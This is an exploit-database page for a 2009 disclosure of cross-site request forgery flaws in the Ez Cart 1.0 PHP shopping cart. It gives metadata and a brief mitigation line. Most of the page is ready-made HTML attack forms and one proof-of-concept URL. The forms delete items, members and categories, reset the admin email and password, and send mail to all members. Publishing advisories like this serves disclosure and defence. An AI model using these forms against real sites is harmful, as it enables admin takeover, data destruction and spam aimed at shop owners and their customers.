header-logo
Suggest Exploit
vendor:
Ez Cart
by:
Milos Zivanovic
7.5
CVSS
HIGH
Multiple XSRF Vulnerabilities
352
CWE
Product Name: Ez Cart
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:scriptsez.net:ez_cart:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2009

Ez Cart Multiple XSRF Vulnerabilities

Multiple XSRF vulnerabilities exist in Ez Cart version 1.0. These vulnerabilities allow an attacker to remove an item by ID, remove a member by ID, remove a category by ID, change admin info, and send emails to all members. An attacker can exploit these vulnerabilities by crafting a malicious form and sending it to the target application.

Mitigation:

Implement proper input validation and authentication mechanisms to prevent XSRF attacks.
Source

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Cart Multiple XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 15. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Cart
[#] Version: 1.0
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Content%20Management&id=2472658093
[#] Price: 25 USD
[#] Vulnerability: Multiple XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--Remove item by id
 |--Remove member by id (not tested)
 |--Remove category by id
 |--Change admin info
 |--Send emails to all members

[+]Remove item by id

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ezcart_demo/admin.php?action=delete&id=[ID]"
method="post">
  <input type="hidden" name="jid" value="3">
  <input type="hidden" name="confirm" value="yes">
  <input type="submit" name="submit" value=" YES ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Remove member by id (not tested)

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ezcart_demo/admin.php?action=confirm"
method="post">
  <input type="hidden" name="id" value="[ID]">
  <input type="hidden" name="do" value="yes">
  <input type="submit" name="submit" value=" YES ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Remove category by id

[POC----------------------------------------------------------------------------------------------]
http://localhost/ezcart_demo/admin.php?action=categories&do=delete&op=[ID]
[POC----------------------------------------------------------------------------------------------]

[*]Change admin info

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ezcart_demo/admin.php?action=admin_opt"
method="post">
  <input type="hidden" name="email" value="my@mail.com">
  <input type="hidden" name="password" value="hacked">
  <input type="hidden" name="company" value="Ez Cart Company">
  <input type="hidden" name="paypal" value="paypal[at]account">
  <input type="hidden" name="checkout" value="000000">
  <input type="hidden" name="shipping" value="5">
  <input type="hidden" name="currency" value="USD">
  <input type="hidden" name="add" value="true">
  <input type="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Send emails to all members

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ezcart_demo/admin.php?action=newsletter"
method="post">
<input type="hidden" name="subject" value="got hacked">
<input type="hidden" name="message" value="this is my message">
<input type="hidden" name="send" value="true">
<input type="submit" name="submit" value=" Send ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF